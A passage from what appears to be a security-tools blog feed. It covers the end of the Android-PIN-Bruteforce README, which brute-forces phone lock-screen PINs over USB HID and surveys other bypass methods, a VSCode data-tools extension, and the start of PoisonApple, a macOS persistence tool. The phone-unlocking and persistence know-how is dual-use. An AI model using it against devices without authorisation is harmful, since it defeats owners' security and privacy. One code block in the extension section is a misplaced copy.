SSH.</li> <li>The locked phone will power the NetHunter phone, because it appears as a keyboard accessory</li> <li>Use a USB OTG cable with a Y splitter for an external power supply, to allow charging of the NetHunter phone while cracking</li> <li>Take breaks to charge your devices. Pause the script with CTRL-Z and resume with the <code>fg</code> shell command.</li> <li>Avoid the SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS configuration option. This will cause the locked phone to use more battery to keep the screen powered. Instead use the SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END option (Default).</li> </ul> <br /><b>Check the Diagnostics Report</b><br /> <p>Use the command <code>diag</code> display diagnostic information.</p> <p><code>bash ./android-pin-bruteforce diag</code></p> <p>If you receive this message when the USB cable is plugged in then try taking the battery out of the locked Android phone and power cycling it.</p> <p><code>[FAIL] HID USB device not ready. Return code from /system/xbin/hid-keyboard was 5.</code></p> <br /><b>How the usb-devices command works</b><br /> <p>The diagnostics command uses the <code>usb-devices</code> script but it is only necessary as part of determining whether the USB cables are incorrectly connected. This can be downloaded from <a href="https://github.com/gregkh/usbutils/blob/master/usb-devices" rel="nofollow" target="_blank" title="https://github.com/gregkh/usbutils/blob/master/usb-devices">https://github.com/gregkh/usbutils/blob/master/usb-devices</a></p> <br /><b>Use verbose output</b><br /> <p>Use the <code>--verbose</code> option to check the configuration is as expected. This is especially useful when you are modifying the configuration.</p> <br /><b>Use the dry-run</b><br /> <p>Use the <code>--dry-run</code> option to check how it operates without sending any keys to a device. This is especially useful when you are modifying the configuration or during development.</p> <p>Dry run will:</p> <ul> <li>Not send any keys</li> <li>Will continue instead of aborting if the <code>KEYBOARD_DEVICE</code> or <code>HID_KEYBOARD</code> is missing.</li> </ul> <br /><b>HID USB Mode</b><br /> <p>Try this command in a shell on the NetHunter phone: <code>/system/bin/setprop sys.usb.config hid</code></p> <br /><span style="font-size: large;"><b><div></div> Known Issues</b></span><br /> <ul> <li>This cannot detect when the correct PIN is guessed and the phone unlocks.</li> <li>Your phones may run out of <div></div> battery before the correct PIN is found.</li> <li>Don't trust phone configuration files from unknown sources without reviewing them first. The configuration files are shell scripts and could include malicious commands.</li> </ul> <br /><span style="font-size: large;"><b><div></div> Roadmap</b></span><br /> <ul> <li>[DONE] Works</li> <li>[DONE] Detects USB HID failures</li> <li>[DONE] Improve Usage and commandline options/config files</li> <li>[DONE] Add bruteforce for n digit PINs</li> <li>[DONE] Mask for known digits</li> <li>[DONE] Crack PIN list in reverse (to find which recent PIN unlocked the device)</li> <li>[DONE] Implement configurable lockscreen prompt</li> <li>[DONE] Implement cooldown change after 10 attempts</li> <li>[WORKING] Find/test more devices to bruteforce</li> <li>Add progress bar</li> <li>Add ETA</li> <li>ASCII art</li> <li>Nicer GUI for NetHunter</li> <li>Implement for iPhone</li> <li>Detect when a phone is unlocked (Use Nethunter camera as a sensor?)</li> <li>Crack Android Patterns (try common patterns first)</li> </ul> <br /><span style="font-size: large;"><b><div></div> Contributing</b></span><br /> <p>Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.</p> <p>Please make sure to update tests as appropriate.</p> <br /><span style="font-size: large;"><b><div></div> Authors and acknowledgment</b></span><br /> <p>Developed by Andrew Horton (@urbanadventurer).</p> <p></p><div></div> The following people have been very helpful: <ul> <li>Vlad Filatov (@v1adf): Testing many phones for the Wiki Phone Database</li> </ul> <br /><b>Motivation</b><br /> <p>My original motivation to develop this was to unlock a Samsung S5 Android phone. It had belonged to someone who had passed away, and their family needed access to the data on it. As I didn't have a USB <a href="https://www.kitploit.com/search/label/Rubber%20Ducky" target="_blank" title="Rubber Ducky">Rubber Ducky</a> or any other hardware handy, I tried using a variety of methods, and eventually realised I had to develop something new.</p> <br /><b>Credit</b><br /> <p>The optimised PIN list is from Justin Engler (@justinengler) & Paul Vines from Senior Security Engineer, iSEC Partners and was used in their Defcon talk, <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO).">Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO).</a>.</p> <br /><b>Graphics</b><br /> <p>Designed by Andrew Horton and gratefully using these free vector packs:</p> <ul> <li><a href="https://www.vecteezy.com/vector-art/159576-usb-ports-isometric-free-vector" rel="nofollow" target="_blank" title="USB Ports Isometric Free Vector by VisionHeldup">USB Ports Isometric Free Vector by VisionHeldup</a></li> <li><a href="https://www.vecteezy.com/vector-art/107006-hdmi-and-usb-vector-set" rel="nofollow" target="_blank" title="HDMI and USB Vector Set by Mary Winkler">HDMI and USB Vector Set by Mary Winkler</a></li> <li><a href="https://www.vecteezy.com/vector-art/661831-isometric-data-security-illustration" rel="nofollow" target="_blank" title="Isometric Data Security Illustration by Rizal.Medanguide">Isometric Data Security Illustration by Rizal.Medanguide</a></li> <li>Kali NetHunter Logo</li> </ul> <br /><span style="font-size: large;"><b><div></div> Comparison with other projects and methods to unlock a locked Android phone</b></span><br /> <br /><b>What makes this project unique?</b><br /> <p>I've been asked what makes this project unique when there are other open-source Android PIN cracking projects.</p> <p>Android-PIN-Bruteforce is unique because it cracks the PIN on Android phones from a NetHunter phone and it doesn't need the locked phone to be pre-hacked.</p> <p>It works:</p> <ul> <li>Without having to buy special hardware, such as a Rubber Ducky, Celebrite, or XPIN Clip.</li> <li>Without ADB or root access (the phone doesn't have to be pre-hacked).</li> </ul> <table> <tr> <th>Project</th> <th>ADB/USB Debugging</th> <th>Requires root</th> <th>Requires $ hardware</th> <th>Commercial</th> </tr> <tr> <td><div>⭐</div> Android-PIN-Bruteforce</td> <td>No</td> <td>No</td> <td>Nethunter phone</td> <td>No</td> </tr> <tr> <td>github.com/PentesterES/AndroidPINCrack</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/ByteRockstar1996/Cracking-Android-Pin-Lock</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/sch3m4/androidpatternlock</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/georgenicolaou/androidlockcracker</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/MGF15/P-Decode</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/BitesFor/ABL</td> <td>Yes</td> <td>Yes</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/wuseman/WBRUTER</td> <td>Yes</td> <td>No</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/Gh005t/Android-BruteForce</td> <td>Yes</td> <td>No</td> <td>No</td> <td>No</td> </tr> <tr> <td>github.com/mandatoryprogrammer/droidbrute</td> <td>No</td> <td>No</td> <td>Rubber Ducky $</td> <td>No</td> </tr> <tr> <td>github.com/hak5darren/USB-Rubber-Ducky</td> <td>No</td> <td>No</td> <td>Rubber Ducky $</td> <td>Yes</td> </tr> <tr> <td>github.com/bbrother/stm32f4androidbruteforce</td> <td>No</td> <td>No</td> <td>STM32F4 dev board $</td> <td>No</td> </tr> <tr> <td>hdb-team.com/product/hdbox/</td> <td>No</td> <td>No</td> <td>HDBOX $$</td> <td>Yes</td> </tr> <tr> <td>xpinclip.com</td> <td>No</td> <td>No</td> <td>XPINClip $$</td> <td>Yes</td> </tr> <tr> <td>cellebrite.com/en/ufed/</td> <td>No</td> <td>No</td> <td>Cellebrite UFED $$$</td> <td>Yes</td> </tr> </table> <p>Some of these projects/products are really awesome but they achieve a different goal to Android-PIN-Bruteforce.</p> <p>If a project requires a gestures.key or password.key, I've listed it as requiring root. If a project requires a custom bootloader, I've listed that as requiring both ADB and root. If you would like your project listed in this table then please open a new issue. There are links to each of these projects in the </p><div></div> Related Projects & Futher Reading section. <br /><b><div></div> Regular phone users</b><br /> <ul> <li>Try the top 20 PINs from the <a href="https://datagenetics.com/blog/september32012/index.html" rel="nofollow" target="_blank" title="DataGenetics PIN analysis">DataGenetics PIN analysis</a> that apparently unlocks 26.83% of phones.</li> <li>Use an SMS lock-screen bypass app (requires app install before phone is locked)</li> <li>Use Samsung Find My Mobile (requires you set it up before phone is locked)</li> <li>Crash the Lock Screen UI (Android 5.0 and 5.1)</li> <li>Use the Google Forgot pattern, Forgot PIN, or Forgot password (Android 4.4 KitKat and earlier)</li> <li>Factory Reset (you lose all your data</li> </ul> <b><div><br /></div> Users who have already replaced their Android ROM</b><br /> <p>If the phone has already been rooted, has USB debugging enabled, or has adb enabled.</p> <ul> <li>Flash the <code>Pattern Password Disable</code> ZIP using a custom recovery (Requires TWRP, CMW, Xrec, etc.)</li> <li>Delete <code>/data/system/gesture.key</code> or <code>password.key</code> (requires root and adb on locked device)</li> <li>Crack <code>/data/system/gesture.key</code> and <code>password.key</code> (requires root and adb on locked device)</li> <li>Update sqlite3 database <code>settings.db</code> (requires root and adb on locked device)</li> </ul> <br /><b><div></div> Forensic Investigators</b><br /> <p>These methods can be expensive and are usually only used by specialised phone forensic investigators.</p> <p>In order of difficulty and expense:</p> <ul> <li>Taking advantage of USB debugging being enabled (Oxygen Forensic Suite)</li> <li>Bruteforce with keyboard emulation (<div>⭐</div> Android-PIN-Bruteforce, RubberDucky attack, XPIN Clip, HBbox)</li> <li>JTAG (Interface with TAPs (Test Access Ports) on the device board)</li> <li>In-System Programming (ISP) (Involves directly connecting to pins on flash memory chips on the device board)</li> <li>Chip Off (Desolder and remove flash memory chips from the device)</li> <li>Clock Glitching / Voltage <a href="https://www.kitploit.com/search/label/Fault%20Injection" target="_blank" title="Fault Injection">Fault Injection</a> (Hardware CPU timing attacks to bypass PIN restrictions)</li> <li>Bootloader exploits (Zero-day exploits that attack the bootloader. GrayKey from Grayshift and Cellebrite)</li> </ul> <p>JTAG, ISP, and Chip Off techniques are less useful now because most devices are encrypted. I don't know of any practical attacks on phone PINs that use clock glitching, if you know of a product that uses this technique please let me know so I can include it.</p><p><span style="font-weight: bold;"></span></p><b> Security Professionals and Technical Phone Users</b><br /> <p>Use the USB HID Keyboard Bruteforce with some dedicated hardware.</p> <ul> <li>A RubberDucky and Darren Kitchen's Hak5 brute-force script</li> <li>Write a script for a USB Teensy</li> <li>Buy expensive forensic hardware</li> <li>Or you can use Android-PIN-Bruteforce with your NetHunter phone!</li> </ul> <p>Attempts to use an otherwise awesome project Duck Hunter, to emulate a RubberDucky payload for Android PIN cracking did not work. It crashed the phone probably because of the payload length.</p><p><br /></p><span style="font-size: large;"><b> Related Projects & Futher Reading</b></span><br /> <br /><b>USB HID Hardware without NetHunter</b><br /> <p>hak5 12x17: Hack Any 4-digit Android PIN in 16 hours with a USB Rubber Ducky <a href="https://archive.org/details/hak5_12x17" rel="nofollow" target="_blank" title="https://archive.org/details/hak5_12x17">https://archive.org/details/hak5_12x17</a></p> <p>Hak5: USB Rubber Ducky <a href="https://shop.hak5.org/products/usb-rubber-ducky-deluxe" rel="nofollow" target="_blank" title="https://shop.hak5.org/products/usb-rubber-ducky-deluxe">https://shop.hak5.org/products/usb-rubber-ducky-deluxe</a></p> <p>USB-Rubber-Ducky Payloads <a href="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads" rel="nofollow" target="_blank" title="https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads">https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads</a></p> <p>Teensy <a href="https://www.pjrc.com/teensy/" rel="nofollow" target="_blank" title="https://www.pjrc.com/teensy/">https://www.pjrc.com/teensy/</a></p> <p>Brute Forcing An Android Phone with a STM32F4Discovery Development Board <a href="https://github.com/bbrother/stm32f4androidbruteforce" rel="nofollow" target="_blank" title="https://github.com/bbrother/stm32f4androidbruteforce">https://github.com/bbrother/stm32f4androidbruteforce</a> <a href="https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/" rel="nofollow" target="_blank" title="https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/">https://hackaday.com/2013/11/10/brute-forcing-an-android-phone/</a></p> <p>Automated brute force attack against the Mac EFI PIN (Using a Teensy) <a href="https://orvtech.com/atacar-efi-pin-macbook-pro-en.html" rel="nofollow" target="_blank" title="https://orvtech.com/atacar-efi-pin-macbook-pro-en.html">https://orvtech.com/atacar-efi-pin-macbook-pro-en.html</a> <a href="https://hackaday.io/project/2196-efi-bruteforcer" rel="nofollow" target="_blank" title="https://hackaday.io/project/2196-efi-bruteforcer">https://hackaday.io/project/2196-efi-bruteforcer</a></p> <p>Droidbrute: An Android PIN cracking USB rubber ducky payload made efficient with a statistically generated wordlist. <a href="https://github.com/mandatoryprogrammer/droidbrute" rel="nofollow" target="_blank" title="https://github.com/mandatoryprogrammer/droidbrute">https://github.com/mandatoryprogrammer/droidbrute</a></p> <p>Discussion forum about the hak5 episode, and Android Brute Force 4-digit pin <a href="https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/" rel="nofollow" target="_blank" title="https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/">https://forums.hak5.org/topic/28165-payload-android-brute-force-4-digit-pin/</a></p> <br /><b>NetHunter HID keyboard attacks</b><br /> <p>NetHunter HID Keyboard Attacks <a href="https://www.kali.org/docs/nethunter/nethunter-hid-attacks/" rel="nofollow" target="_blank" title="https://www.kali.org/docs/nethunter/nethunter-hid-attacks/">https://www.kali.org/docs/nethunter/nethunter-hid-attacks/</a></p> <br /><b>Linux Kernel HID support</b><br /> <p>Human Interface Devices (HID) <a href="https://www.kernel.org/doc/html/latest/hid/index.html#" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/hid/index.html#">https://www.kernel.org/doc/html/latest/hid/index.html#</a></p> <p>Linux USB HID gadget driver and hid-keyboard program <a href="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html">https://www.kernel.org/doc/html/latest/usb/gadget_hid.html</a> <a href="https://github.com/aagallag/hid_gadget_test" rel="nofollow" target="_blank" title="https://github.com/aagallag/hid_gadget_test">https://github.com/aagallag/hid_gadget_test</a></p> <p>The usb-devices script <a href="https://github.com/gregkh/usbutils/blob/master/usb-devices" rel="nofollow" target="_blank" title="https://github.com/gregkh/usbutils/blob/master/usb-devices">https://github.com/gregkh/usbutils/blob/master/usb-devices</a></p> <br /><b>Cracking Android PIN and Pattern files</b><br /> <p>AndroidPINCrack - bruteforce the Android Passcode given the hash and salt (requires root on the phone) <a href="https://github.com/PentesterES/AndroidPINCrack" rel="nofollow" target="_blank" title="https://github.com/PentesterES/AndroidPINCrack">https://github.com/PentesterES/AndroidPINCrack</a></p> <p>Android Pattern Lock Cracker - bruteforce the Android Pattern given an SHA1 hash (requires root on the phone) <a href="https://github.com/sch3m4/androidpatternlock" rel="nofollow" target="_blank" title="https://github.com/sch3m4/androidpatternlock">https://github.com/sch3m4/androidpatternlock</a></p> <br /><b>General Recovery Methods</b><br /> <p>[Android][Guide]Hacking And Bypassing Android Password/Pattern/Face/PI <a href="https://forum.xda-developers.com/showthread.php?t=2620456" rel="nofollow" target="_blank" title="https://forum.xda-developers.com/showthread.php?t=2620456">https://forum.xda-developers.com/showthread.php?t=2620456</a></p> <p>Android BruteForce using ADB & Shell Scripting <a href="https://github.com/Gh005t/Android-BruteForce" rel="nofollow" target="_blank" title="https://github.com/Gh005t/Android-BruteForce">https://github.com/Gh005t/Android-BruteForce</a></p> <br /><b>Forensic Methods and Hardware</b><br /> <p>PATCtech Digital Forensics: Getting Past the Android Passcode <a href="http://patc.com/online/a/Portals/965/Android%20Passcode.pdf" rel="nofollow" target="_blank" title="http://patc.com/online/a/Portals/965/Android%20Passcode.pdf">http://patc.com/online/a/Portals/965/Android%20Passcode.pdf</a></p> <p>XPIN Clip <a href="https://xpinclip.com/" rel="nofollow" target="_blank" title="https://xpinclip.com/">https://xpinclip.com/</a></p> <p>HDBox from HDB Team <a href="https://hdb-team.com/product/hdbox/" rel="nofollow" target="_blank" title="https://hdb-team.com/product/hdbox/">https://hdb-team.com/product/hdbox/</a></p> <p>Cellebrite UFED <a href="https://www.cellebrite.com/en/ufed/" rel="nofollow" target="_blank" title="https://www.cellebrite.com/en/ufed/">https://www.cellebrite.com/en/ufed/</a></p> <p>GrayKey from Grayshift <a href="https://www.grayshift.com/graykey/" rel="nofollow" target="_blank" title="https://www.grayshift.com/graykey/">https://www.grayshift.com/graykey/</a></p> <br /><b>PIN Analysis</b><br /> <p>Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO) <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler">https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler</a></p> <p>DataGenetics PIN analysis <a href="https://datagenetics.com/blog/september32012/index.html" rel="nofollow" target="_blank" title="https://datagenetics.com/blog/september32012/index.html">https://datagenetics.com/blog/september32012/index.html</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/urbanadventurer/Android-PIN-Bruteforce" rel="nofollow" target="_blank" title="Download Android-PIN-Bruteforce">Download Android-PIN-Bruteforce</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-14951890310113649332021-04-15T08:30:00.007-04:002021-04-15T08:30:00.626-04:00Swissknife - Scriptable VSCode Extension To Generate Or Manipulate Data. Stop Pasting Sensitive Data In Webpag<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-B5UpDT2KTZM/YHYm_4SzRUI/AAAAAAAAV3k/MaaFXoBhY_wWvhbc0BcRnWVihahr3pzmwCNcBGAsYHQ/s1200/vscode-swissknife_1_swissknife_banner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="600" data-original-width="1200" height="320" src="https://1.bp.blogspot.com/-B5UpDT2KTZM/YHYm_4SzRUI/AAAAAAAAV3k/MaaFXoBhY_wWvhbc0BcRnWVihahr3pzmwCNcBGAsYHQ/w640-h320/vscode-swissknife_1_swissknife_banner.png" width="640" /></a></div><p><br /></p><p>The developers swissknife. Do conversions and generations right out of vs code. Extendable with user scripts</p> <p>Available in the <a href="https://marketplace.visualstudio.com/items?itemName=luisfontes19.vscode-swissknife" rel="nofollow" target="_blank" title="Visual Studio Marketplace">Visual Studio Marketplace</a></p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Currently available scripts</b></span><br /> <ul> <li>Base64 decode</li> <li>Base64 encode</li> <li>Binary To Text</li> <li>Bip39 Mnemonic</li> <li>CSV to Markdown</li> <li>Count characters</li> <li>Count words</li> <li>Crypto currency value</li> <li>Date to Timestamp</li> <li>Eliptic Curve Key Pair</li> <li>Generate Password</li> <li>HTML Encode (AlL)</li> <li>Hex decode</li> <li>Hex encode</li> <li>Hex to RGB</li> <li>Identify hash</li> <li>JWT Decode</li> <li>Join lines</li> <li>Lorem Ipsum</li> <li>Markdown to HTML</li> <li>Md5 hash</li> <li>New Swissknife Script (JS)</li> <li>New Swissknife Script (TS)</li> <li>Password strength</li> <li>RGB To Hex</li> <li>RSA Key pair</li> <li>Random String</li> <li>Request to fetch</li> <li>SHA1 hash</li> <li>SHA256 hash</li> <li>SHA512 hash</li> <li>Self Signed Certificate</li> <li>Start Local HTTP Server</li> <li>Start Local HTTPS Server</li> <li>Stop HTTP Server</li> <li>Text To Binary</li> <li>Text to String</li> <li>Timestamp to Date</li> <li>To Camel Case</li> <li>To Lower Case</li> <li>To Morse code</li> <li>To Upper Case</li> <li>UUIDv4</li> <li>Unicode decode</li> <li>Unicode encode (js format)</li> <li>Unix/Linux Permission To Human Readable</li> <li>Url Decode</li> <li>Url Encode</li> <li>Url Encode (All Characters)</li> <li>Url Shorten</li> <li>Url Unshorten (url expand)</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>You can invoke the dedicated command pallete with <code>ctrl+shift+9</code> for <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="windows">windows</a> or <code>cmd+shift+9</code> for mac (when focusing the editor)</p> <p>The conversions will only use the selected text by default. If no text is selected the entire content of the editor will be used. It supports multi selection and will run the script for each selection individually</p> <p><strong>Macbook Touchbar Support</strong> You can also invoke the swissknife extension directly from the macbook's touchbar <a href="https://github.com/luisfontes19/vscode-swissknife/blob/master/data/touchbar_support.png" rel="nofollow" target="_blank" title="Scriptable VSCode extension to generate or manipulate data. Stop pasting sensitive data in webpages. (6)"></a></p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-CsvWH40VC2k/YHYmkzayvNI/AAAAAAAAV3c/nJfcgswwkJMY94S4iCGdLddi92tJY0RWwCNcBGAsYHQ/s789/vscode-swissknife_4_touchbar_support.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="60" data-original-width="789" height="49" src="https://1.bp.blogspot.com/-CsvWH40VC2k/YHYmkzayvNI/AAAAAAAAV3c/nJfcgswwkJMY94S4iCGdLddi92tJY0RWwCNcBGAsYHQ/w640-h49/vscode-swissknife_4_touchbar_support.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Scripts Details</b></span><br /> <br /><b>Crypto currency value</b><br /> <p>Uses the API from <a href="https://github.com/luisfontes19/vscode-swissknife/blob/master/cryptonator.com" rel="nofollow" target="_blank" title="Cryptonator">Cryptonator</a>. You can specify conversions directly from the text like:</p> <pre lang="text"><code>1btc to eur </code></pre> <p>For a list of supported currencies check <a href="https://www.cryptonator.com/api/currencies" rel="nofollow" target="_blank" title="here">here</a></p> <br /><b>Identify Hash</b><br /> <p>The outcome of the operation may return multiple values, as a hashes from different algorithms have the same output format. Still we organize the hashes from top down by most relevant.</p> <br /><b>HTTP(S) Server</b><br /> <p>The servers log all requests received into the "Output" window of VSCode (You can show it by going to view -> Output in the menu). Then on the right of the window (where usually has the value "Tasks"), filter by "Swissknife Server"</p> <br /><span style="font-size: large;"><b>Privacy Note</b></span><br /> <p>One of the main purposes of this extension is to stop pasting data, or trusting generated data from random websites. The extension avoids doing external web requests or <a href="https://www.kitploit.com/search/label/Logging" target="_blank" title="logging">logging</a> data, for privacy. But there are some <a href="https://www.kitploit.com/search/label/Operations" target="_blank" title="operations">operations</a> where external requests are needed:</p> <ul> <li> <p><strong>Crypto Currency Value</strong> - Does a request to the cryptonator api to get the available cryptocurrencies and a request to get the current price for a specific pair. <strong>The amount being converted is not sent</strong>, this is calculated on the local machine.</p> </li> <li> <p><strong>Url Unshorten</strong> - This one really needs to do the request to the short url, so it can get the redirect (full) url. But keep in mind that the full url is never reached, the extension does not follow the redirect.</p> </li> <li> <p><strong>URL Shortening</strong> - The shortening feature uses <a href="https://tinyurl.com" rel="nofollow" target="_blank" title="https://tinyurl.com">https://tinyurl.com</a> to register a new short URL.</p> </li> </ul> <br /><span style="font-size: large;"><b>Writing Scripts</b></span><br /> <p>Swissknife will automatically load all <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="scripts">scripts</a> in its user <a href="https://www.kitploit.com/search/label/Scripting" target="_blank" title="scripting">scripting</a> folder and you can find it by executing a command. Open you command pallete and type "Open swissknife users script folder". Or just start typing it as it will eventually be suggested. This is the folder where you can create your custom scripts.</p> <p>To start a new script you can also use a command provided by the extension. Open swissknife picker and type "New swissknife script".</p> <br /><b>Script Reloading</b><br /> <p>Scripts are loaded into the extension when initializing VS Code, so when you create a custom script you'll need to reload the scripts. To make it easier for development, the extension has a command "Reload Swissknife Scripts" that you can call from the VS Code command pallette (do not confuse with the swissknife's script launcher).</p> <p>Remember that everytime you do a change in a script in the user script folder you need to reload scripts.</p> <br /><b>Starting Template</b><br /> <p>You can chose the TS or JS version according to what you're more comfortable with. TS will be more complex as you need to transpile it to JS. We'll go with Javascript. This is the base structure of the script:</p> <div><pre><code>1btc to eur<br /></code></pre></div> <p>This is the basic template to create scripts. In this file we created a script called "My Script". You can have as much scripts as you want per file. Its just a way of organization :) As you can see at the end, the structure for a script consists on 3 properties: title, detail and cb. The first two are self explanatory. cb is the code that will be called when you script runs. And by default swissknife gives you a few methods to help getting started, through the variable 'context'. The method doSomething is just replacing a's with b's</p> <br /><b>Context</b><br /> <p>In context you have some nice methods to help you out, and you should use them whenever possible.</p> <ul> <li>insertRoutine(cb) - This method will insert the resolved content into the cursor on editor. It will call cb and send context as a parameter. <strong>cb is expected to be async</strong></li> <li>informationRoutine(cb) - This method will create a notification with the resolved content. It will call cb and send selected text in editor (all text if no selection) and context as a parameter. <strong>cb is expected to be async</strong></li> <li>replaceRoutine(cb) - This method will replace selected text in editor, with the resolved content from cb (if no text selected it replaces all text). It will call cb and send selected text in editor (all text if no selection) and context as a parameter. <strong>cb is expected to be async</strong></li> <li>vscode - This variable holds the <a href="https://code.visualstudio.com/api" rel="nofollow" target="_blank" title="vscode api">vscode api</a>.</li> <li>modules - This variable is an array of all JS modules inside the <a href="https://github.com/luisfontes19/vscode-swissknife/tree/master/src/scripts" rel="nofollow" target="_blank" title="script (and lib) folder">script (and lib) folder</a>. You can use them to call methods from the native scripts, to reuse code logic. Ex: context.modules.passwords.generateSecureCharCode())</li> </ul> <p>The use of this methods is optional. If you feel that its easier to just work directly with vscode api you can also do it:</p> <div><pre><code>Object.defineProperty(exports, "__esModule", { value: true });<br /><br />exports.doSomething = async (text, context) => {<br /> return new Promise((resolve, reject) => {<br /><br /> resolve(text.replace(/a/g, "b"));<br /><br /> });<br />}<br />const scripts = [<br /> {<br /> title: "My Script",<br /> detail: "This script does something",<br /> cb: (context) => context.replaceRoutine(exports.doSomething)<br /> },<br />]<br /><br />exports.default = scripts;</code></pre></div> <br /><span style="font-size: large;"><b>More Examples</b></span><br /> <div><pre><code>Object.defineProperty(exports, "__esModule", { value: true });<br /><br />const scripts = [<br /> {<br /> title: "My Script2",<br /> detail: "This script does something",<br /> cb: (context) => {<br /> console.log(context)<br /> const editor = context.vscode.window.activeTextEditor;<br /> editor.edit((edit) => {<br /> edit.insert(editor.selection.myactive, "Doing stuff")<br /> });<br /> }<br /> },<br />]<br /><br />exports.default = scripts;</code></pre></div> <p>The best place to see examples is to check the <a href="https://github.com/luisfontes19/vscode-swissknife/tree/master/src/scripts" rel="nofollow" target="_blank" title="native scripts">native scripts</a> bundled with the extension.</p> <br /><span style="font-size: large;"><b>Future Plans</b></span><br /> <ul> <li>Create unit tests, specially for the scripts</li> <li>Start doing proper error handlings</li> <li>Create a place for user contributed scripts</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/luisfontes19/vscode-swissknife/" rel="nofollow" target="_blank" title="Download Vscode-Swissknife">Download Vscode-Swissknife</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-82461341955725240012021-04-09T17:30:00.014-04:002021-04-09T17:30:00.511-04:00PoisonApple - macOS Persistence Tool<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-3eJpGzR4jCw/YGvdt_8YhII/AAAAAAAAVz0/tson_bgPELET5D6FG6gpLY8-CfOZ5PMigCNcBGAsYHQ/s333/PoisonApple_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="333" data-original-width="333" height="400" src="https://1.bp.blogspot.com/-3eJpGzR4jCw/YGvdt_8YhII/AAAAAAAAVz0/tson_bgPELET5D6FG6gpLY8-CfOZ5PMigCNcBGAsYHQ/w400-h400/PoisonApple_1.png" width="400" /></a></div><p><br /></p> <p></p> <p>Command-line tool to perform various persistence mechanism techniques on macOS. This tool was designed to be used by <a href="https://www.kitploit.com/search/label/Threat" target="_blank" title="threat">threat</a> hunters for cyber threat <a href="https://www.kitploit.com/search/label/Emulation" target="_blank" title="emulation">emulation</a> purposes.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Install</b></span><br /> <p>Do it up:</p> <pre><code>$ pip3 install poisonapple --user<br /></code></pre> <p>Note: PoisonApple was written & tested using Python 3.9, it should work using Python 3.6+</p> <br /><span style="font-size: large;"><b>Important Notes!</b></span><br /> <ul> <li>PoisonApple will make modifications to your macOS system, it's advised to only use PoisonApple on a virtual machine. Although any persistence mechanism technique added using this tool can also be easily removed (-r), <strong>please use with caution</strong>!</li> <li>Be advised: This tool will likely cause common AV / EDR / other macOS security products to generate alerts.</li> <li>To understand how any of these techniques work in-depth please see <a href="https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf" rel="nofollow" target="_blank" title="The Art of Mac Malware, Volume 1:">The Art of Mac Malware, Volume 1: </a><a href="https://www.kitploit.com/search/label/Analysis" target="_blank" title="Analysis">Analysis</a> - Chapter 0x2: Persistence by Patrick Wardle of Objective-See. It's a fantastic resource.</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>See PoisonApple switch options (--help):</p> <pre><code>$ poisonapple --help<br />usage: poisonapple [-h] [-l] [-t TECHNIQUE] [-n NAME] [-c COMMAND] [-r]<br /><br />Command-line tool to perform various persistence mechanism techniques on macOS.<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -l, --list list available persistence mechanism techniques<br /> -t TECHNIQUE, --technique TECHNIQUE<br /> persistence mechanism technique to use<br /> -n NAME, --name NAME name for the file or label used for persistence<br /> -c COMMAND, --command COMMAND<br /> command(s) to execute for persistence<br /> -r, --remove remove persistence mechanism<br /></code></pre> <p>List of available techniques:</p> <pre><code>$ poisonapple --list<br /> , _______ __<br /> .-.:|.-. | _ .-----|__|-----.-----.-----.<br />.' '. |. | | | | |__ --| | | | |<br />'-."~". .-' |. ____|_____|__|_____|_____|__|__|<br 